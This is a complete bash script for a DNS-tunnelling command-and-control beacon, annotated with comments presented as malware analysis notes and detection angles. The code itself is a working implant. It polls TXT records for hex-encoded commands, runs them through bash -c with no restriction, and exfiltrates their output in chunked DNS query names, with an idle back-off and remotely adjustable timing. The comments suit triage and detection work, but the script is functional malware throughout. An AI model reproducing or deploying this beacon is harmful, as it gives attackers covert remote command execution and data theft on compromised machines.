#!/bin/bash
# DNS-tunnelling beacon (analysis notes). Every setting is hard-coded, so the
# literals below double as static indicators when triaging a sample.
CLIENT_NAME="client1"            # used as a DNS label in every query this script sends
DEST_DOMAIN="google.com"         # parent domain of every query name (value as found in this sample)
DNS_SERVER="127.0.0.1"           # resolver every dig call is pointed at (@), not the system resolver
DEFAULT_CMD_HEX="70617373"       # hex of "pass": the no-op value substituted when no TXT answer arrives
COMMAND_TIMEOUT=5                # seconds before a received command is killed by timeout(1)
SLEEP_TIME=1                     # base polling interval; changed at runtime by an in-band "sleep N" command
LONG_SLEEP_TIME=5                # interval after MAX_SLEEP_HIT consecutive idle polls
EXTRA_LONG_SLEEP_TIME=10         # interval after a further MAX_LSLEEP_HIT idle polls
DNS_FAILURE_SLEEP_TIME=300       # back-off (seconds) when the TXT lookup returns nothing at all
sleep_counter=0                  # idle polls seen so far at SLEEP_TIME (reset by any real command)
MAX_SLEEP_HIT=60
lsleep_counter=0                 # idle polls seen so far at LONG_SLEEP_TIME
MAX_LSLEEP_HIT=30
# Hex-encode $1 via hexdump: one lowercase two-digit pair per byte, no
# separators and no trailing newline. This is the encoding used for every
# payload label the beacon puts into a DNS query name.
string_to_hex() {
echo -n "$1" | hexdump -ve '1/1 "%.2x"'
}
# Run the decoded command text through `bash -c` under timeout(1) and print
# its combined stdout+stderr hex-encoded.
# Arguments: $1 - command text as received over DNS (no allow-list; it runs
#                 with whatever privileges this script has)
# Outputs:   hex string on stdout
# Notes:     exit status 124 is timeout(1)'s "killed on timeout" code and is
#            replaced by a fixed message; any other non-zero status is ignored.
#            Detection angle: a timeout(1) -> bash -c process chain spawned
#            from a long-running bash parent.
execute_command() {
local cmd=$1
local output
output=$(timeout "$COMMAND_TIMEOUT" bash -c "$cmd" 2>&1)
if [ $? -eq 124 ]; then
output="Command timed out after $COMMAND_TIMEOUT seconds."
fi
string_to_hex "$output"
}
# Exfiltrate a hex string over DNS. The string is consumed in 58-character
# chunks; each chunk becomes the leftmost label of an A query for
# <chunk>.<CLIENT_NAME>.<dest_domain> sent to <dns_server>. A final A query
# for <CLIENT_NAME>.<dest_domain> with no chunk marks end-of-transmission.
# Answers are discarded (>/dev/null), so the data travels only in the query
# names, not in any response.
# Arguments: $1 - hex payload, $2 - destination domain, $3 - resolver to query
# Detection angle: bursts of A queries to one parent domain whose first label
# is a long run of hex characters, followed by a short terminator query.
send_hex_output() {
local hex_output=$1
local dest_domain=$2
local dns_server=$3
while [ -n "$hex_output" ]; do
local chunk=${hex_output:0:58}
hex_output=${hex_output:58}
dig +noedns +nocookie @$dns_server A $chunk.$CLIENT_NAME.$dest_domain > /dev/null 2>&1
done
dig +noedns +nocookie @$dns_server A $CLIENT_NAME.$dest_domain > /dev/null 2>&1
}
# Poll for a command: one TXT lookup of <client_name>.<dest_domain> against
# <dns_server>. dig's blank lines and ";;" status lines are filtered out and
# the quotes around the TXT data removed; what remains is treated as a
# hex-encoded command.
# Arguments: $1 - client label, $2 - destination domain, $3 - resolver
# Outputs:   the TXT payload with all whitespace and control characters
#            stripped, or DEFAULT_CMD_HEX when nothing usable came back
# Side effect: when the lookup yields nothing at all, sleeps
#            DNS_FAILURE_SLEEP_TIME before returning the no-op value.
# Detection angle: a periodic TXT query for a fixed, client-specific name.
get_command_from_server() {
local client_name=$1
local dest_domain=$2
local dns_server=$3
local response
response=$(dig @$dns_server TXT +noedns +nocookie +short $client_name.$dest_domain 2>/dev/null | grep -vE '^[[:space:]]*$|^;;' | tr -d '"')
if [ -z "$response" ]; then
sleep $DNS_FAILURE_SLEEP_TIME
echo "$DEFAULT_CMD_HEX"
return
fi
# Second pass: collapse multi-line TXT data and drop any control bytes.
response=$(echo "$response" | tr -d '[:space:]' | tr -d '[:cntrl:]')
if [ -z "$response" ]; then
echo "$DEFAULT_CMD_HEX"
else
echo "$response"
fi
}
# Print "yes" when $1 is a non-empty string of hex digits (either case),
# otherwise "no". Serves as the only sanity check before the received
# command is xxd-decoded.
is_valid_hex() {
local hex_string=$1
[[ $hex_string =~ ^[0-9a-fA-F]+$ ]] && echo "yes" || echo "no"
}
# Hex-encode a human-readable acknowledgement and send it over the same DNS
# channel as command output, using the global DEST_DOMAIN and DNS_SERVER.
# Arguments: $1 - message text
send_confirmation() {
local message=$1
local message_hex
message_hex=$(string_to_hex "$message")
send_hex_output "$message_hex" $DEST_DOMAIN $DNS_SERVER
}
# Restart the idle back-off ladder (both counters to zero). Called whenever a
# real command or one of the in-band sleep-tuning commands arrives.
reset_sleep_settings() {
sleep_counter=0
lsleep_counter=0
}
# Beacon loop. It never terminates on its own (no exit/break and no
# exit command is recognised). Each iteration:
#   1. fetch the hex command via the TXT lookup
#   2. validate it as hex and decode it with xxd -r -p
#   3. handle the in-band tuning commands "sleep N", "lsleep N", "llsleep N"
#   4. if it is the no-op value, step through the back-off ladder
#      (SLEEP_TIME for MAX_SLEEP_HIT polls, then LONG_SLEEP_TIME for
#      MAX_LSLEEP_HIT polls, then EXTRA_LONG_SLEEP_TIME indefinitely)
#   5. otherwise execute it and exfiltrate the output over DNS
# Detection angle: the fixed TXT-query cadence and the A-query burst that
# follows every executed command.
while true; do
command_hex=$(get_command_from_server $CLIENT_NAME $DEST_DOMAIN $DNS_SERVER)
# Anything that is not pure hex is dropped without decoding.
if [ "$(is_valid_hex $command_hex)" == "no" ]; then
sleep $SLEEP_TIME
continue
fi
command=$(echo "$command_hex" | xxd -r -p 2>/dev/null)
# $? is the exit status of the xxd pipeline inside the substitution.
if [ $? -ne 0 ]; then
sleep $SLEEP_TIME
continue
fi
# Tuning commands are matched on the decoded text; N is the second word.
if [[ "$command" =~ ^sleep\ [0-9]+$ ]]; then
SLEEP_TIME=$(echo $command | awk '{print $2}')
reset_sleep_settings
send_confirmation "Sleep time set to $SLEEP_TIME seconds."
continue
fi
if [[ "$command" =~ ^lsleep\ [0-9]+$ ]]; then
LONG_SLEEP_TIME=$(echo $command | awk '{print $2}')
reset_sleep_settings
send_confirmation "Long sleep time set to $LONG_SLEEP_TIME seconds."
continue
fi
if [[ "$command" =~ ^llsleep\ [0-9]+$ ]]; then
EXTRA_LONG_SLEEP_TIME=$(echo $command | awk '{print $2}')
reset_sleep_settings
send_confirmation "Extra long sleep time set to $EXTRA_LONG_SLEEP_TIME seconds."
continue
fi
# No-op ("pass" in hex): produced locally on a failed lookup, or received
# as-is. Idle polls walk the back-off ladder instead of running anything.
if [ "$command_hex" == "$DEFAULT_CMD_HEX" ]; then
if [ $sleep_counter -lt $MAX_SLEEP_HIT ]; then
sleep_counter=$((sleep_counter + 1))
sleep_time=$SLEEP_TIME
elif [ $lsleep_counter -lt $MAX_LSLEEP_HIT ]; then
lsleep_counter=$((lsleep_counter + 1))
sleep_time=$LONG_SLEEP_TIME
else
sleep_time=$EXTRA_LONG_SLEEP_TIME
fi
sleep $sleep_time
continue
fi
# A real command: reset the ladder, run it, and exfiltrate its output.
reset_sleep_settings
output_hex=$(execute_command "$command")
send_hex_output "$output_hex" $DEST_DOMAIN $DNS_SERVER
sleep $SLEEP_TIME
done